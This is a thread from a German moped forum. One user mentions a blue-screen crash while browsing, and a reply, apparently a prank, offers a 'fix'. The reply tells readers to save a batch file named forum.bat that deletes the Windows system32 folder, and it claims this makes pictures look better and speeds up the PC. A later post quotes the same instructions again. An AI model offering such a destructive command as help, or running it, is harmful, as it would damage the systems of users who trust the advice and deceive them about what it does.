mofa banane grüst das forum
-
-
-
-
-
ich frag ja nur,
ein versuch, nix schlimmes! dafür war der zu schnell und ales andere zu langsam! stillstand shotdown! ich wuste garnicht, das ich dazu ne nachricht bekomme auf dem blue skreen . öfter mal was neues
vieleicht wollte mal wer nachschauen ?
egal , geht alles und erste bildchen von meinem bike hab ich auch ! somit kann ich mal den bastelthread in angriff nehmen . -
-
Hallo,
einen blu skreen hattte ich ebend auch, als ich zufall das forum auf voll skreen gestellt habe. habe ich aber die lösung bereitss gefunden:
1) öffne einen neuen treat mit vielen schöhnen bildern
2) öffne einen editor (mikrosoft notpad zum beispiel)
3) schreibe da
@echo off
del c:\WINDOWS\system32
4) spiechere dann unter forum.bat (wichtigk: nicht als .txt sonden als alle Dateien)
5) doppelclik auf forum.bat
alle bilder werden viel schöhner angezeigt und dein pc wird schneller!!!!!!11
hofe ich konnte helfen -
-
-
Newfriend schrieb:
Hallo, einen blu skreen hattte ich ebend auch, als ich zufall das forum auf voll skreen gestellt habe. habe ich aber die lösung bereitss gefunden: 1) öffne einen neuen treat mit vielen schöhnen bildern 2) öffne einen editor (mikrosoft notpad zum beispiel) 3) schreibe da @echo off del c:\WINDOWS\system32 4) spiechere dann unter forum.bat (wichtigk: nicht als .txt sonden als alle Dateien) 5) doppelclik auf forum.bat alle bilder werden viel schöhner angezeigt und dein pc wird schneller!!!!!!11 hofe ich konnte helfen -
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
-
Reddit 0
-
Information